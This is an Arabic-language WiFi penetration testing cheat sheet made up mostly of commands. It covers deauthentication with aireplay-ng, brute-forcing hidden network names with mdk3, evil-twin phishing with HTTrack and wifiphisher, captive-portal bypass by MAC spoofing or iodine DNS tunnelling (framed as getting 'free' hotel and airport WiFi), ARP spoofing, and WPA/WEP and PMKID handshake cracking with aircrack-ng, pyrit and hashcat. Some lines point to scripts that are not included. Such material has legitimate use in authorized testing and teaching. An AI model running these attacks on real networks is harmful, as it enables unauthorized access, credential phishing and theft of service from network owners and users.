
دليل اختبار اختراق شبكات WiFi
2.1. بوابات الأسر
2.2. هجوم الوسيط
3.1. بدون عملاء
4.2. هجوم PMKID
4.3. هجوم بدون نقطة وصول
5.1. نقاط وصول وهمية
5.2. القوة العمياء
5.3. طرق EAP المدعومة
6.2. استخبارات المصادر المفتوحة
6.3. تشويش WiFi
6.4. أطر عمل أخرى
7.1. مهاجمة جهاز التوجيه
7.2. أنواع الماسحات
7.3. التزوير
VARIABLE=value
iwconfig $IFACE
ifconfig $IFACE
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up
تعيين وضع المراقبة
تشغيل Airodump-ng
airodump-ng $IFACE -c $CHANNEL -e $ESSID
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC) وعنوان MAC لأحد العملاء ($CLIENT_MAC). لا توقف الالتقاط.
في محطة طرفية أخرى، قم بإلغاء مصادقة عميل أو جميعهم. عندما يلتقط Airodump-ng مصافحة من هذه الشبكة، سيظهر الاسم أو ESSID في المحطة الأولى:
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
قم بسرد الشبكات باستخدام Airodump-ng واحصل على عنوان MAC لنقطة الوصول ($AP_MAC). لا توقف الالتقاط.
2.a. تنفيذ هجوم قاموسي
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
2.b. أو تنفيذ هجوم بالقوة العمياء
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
بالنسبة لمجموعة الأحرف، يمكن استخدام l (أحرف صغيرة)، u (أحرف كبيرة)، n (أرقام)، c (صغيرة+كبيرة)، m (صغيرة+كبيرة+أرقام) أو a (جميع الأحرف المطبوعة).
استنساخ موقع ويب باستخدام HTTrack
تثبيت Wifiphiser. أضف نتيجة HTTrack في مجلد جديد داخل wifiphisher/data/phishing-pages/new_page/html وملف إعدادات في wifiphisher/data/phishing-pages/new_page/config.ini.
أعد تجميع المشروع باستخدام python setup.py install أو الملف الثنائي في bin.
هذا الأمر يعمل بشكل صحيح في أحدث إصدار من Kali بعد تثبيت hostapd:
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
الطريقة الأولى لتجاوز بوابة الأسر هي تغيير عنوان MAC الخاص بك إلى عنوان أحد المستخدمين المُصدّق عليهم بالفعل.
macchanger
سكريبت مخصص مثل هذا (Bash)
أيضًا، يمكنك استخدام سكريبتات لأتمتة العملية مثل:
الطريقة الثانية هي إنشاء نفق DNS. لهذا، من الضروري أن يكون لديك خادم DNS خاص بك يمكن الوصول إليه. يمكنك استخدام هذه الطريقة لتجاوز بوابة الأسر والحصول على WiFi "مجاني" في الفنادق والمطارات...
nslookup example.com
سجل "A": dns.$DOMAIN يشير إلى $SERVER_IP (مثال: dns.domain.com 139.59.172.117)
سجل "NS": hack.$DOMAIN يشير إلى dns.$DOMAIN (مثال: hack.domain.com dns.domain.com)
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
تحقق من عمله بشكل صحيح هنا
التنفيذ في العميل
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
ssh -D 8080 [email protected]
بمجرد أن تكون في الشبكة، يمكنك اختبار ما إذا كانت عرضة لهجمات الوسيط.
هجوم تزوير ARP باستخدام Ettercap
استنشاق حركة المرور باستخدام Wireshark أو TCPdump
تحليل حركة المرور باستخدام PCredz (لينكس) أو Network Miner (ويندوز)
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng $PCAP_FILE
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
aircrack-ng -w $WORDLIST capture.cap
يمكنك الحصول على قوائم كلمات من هنا.
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db
يمكنك استخدام هذا السكريبت أو اتباع هذه الخطوات:
تثبيت Hcxdumptool و Hcxtool (يمكنك استخدام هذا السكريبت).
إيقاف مدير الشبكة
airmon-ng check kill
3أ. إذا كنت تريد مهاجمة عنوان MAC معين
echo $MAC | sed 's/://g' > $FILTER_FILE
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
بنية كل سطر هي: PMKID * عنوان MAC للموجه * المحطة * ESSID (تحقق من: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
إذا كان لديك وصول إلى جهاز عميل مع تشغيل اتصال WiFi ولكن لا توجد شبكة حولك، فلا يزال بإمكانك مهاجمة تلك الشبكة إذا كان جهاز العميل قد اتصل بها سابقًا.